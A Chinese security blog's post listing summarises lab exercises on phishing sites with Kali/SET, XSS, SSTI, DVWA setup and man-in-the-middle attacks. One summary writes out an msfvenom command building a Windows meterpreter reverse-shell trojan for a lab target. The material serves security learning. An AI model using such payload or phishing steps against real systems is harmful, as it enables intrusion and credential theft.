摘要: 【Kali制作一个钓鱼网站 - CSDN App】http://t.csdnimg.cn/DqAPm 补充: 实验结果: 【搬运】i春秋SET:社会工程师的工具包-社会工程学-BT5工具集-黑客/渗透测试/网络安全/信息安全/漏洞_哔哩哔哩_bilibili 阅读全文
posted @ 2023-11-18 10:30 ahdbv 阅读(58) 评论(0) 推荐(0) 编辑
摘要: 1.生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe 2.将生成的木马移动到/var/www/html目录下 3.打开apache2 4.靶机和虚拟机 阅读全文
posted @ 2023-11-11 21:15 ahdbv 阅读(44) 评论(0) 推荐(0) 编辑
摘要: XSS 什么是XSS? 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括 HTML 代码和客户端 Javascript 脚本)注入到网页 阅读全文
posted @ 2023-10-11 14:14 ahdbv 阅读(78) 评论(0) 推荐(0) 编辑
摘要: 在网上看视频安装DVWA的时候还是遇到了很多问题,这里截取部分新手问题,提出解决方法,避免踩坑。 kali搭建LAMP 安装apache apt install apache2 -y 设置开机自启动 按q退出 安装mysql apt install mariadb-server -y 同样设置开机自 阅读全文
posted @ 2023-09-24 17:58 ahdbv 阅读(467) 评论(0) 推荐(0) 编辑
摘要: ssti注入 又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行 阅读全文
posted @ 2023-09-11 21:41 ahdbv 阅读(123) 评论(0) 推荐(1) 编辑
摘要: 由一个视频引发的问题 https://v.douyin.com/iJJ9n2r7/ 中间人攻击 由于HTTP本身不具备加密的功能,所以也无法做到对通信整体(使用HTTP协议通信的请求和相应的内容)进行加密,即HTTP报文使用明文(未经过加密的报文)方式发送。 (对应于信件使用的文字不加密) 抓包:可 阅读全文
posted @ 2023-08-03 13:02 ahdbv 阅读(57) 评论(0) 推荐(0) 编辑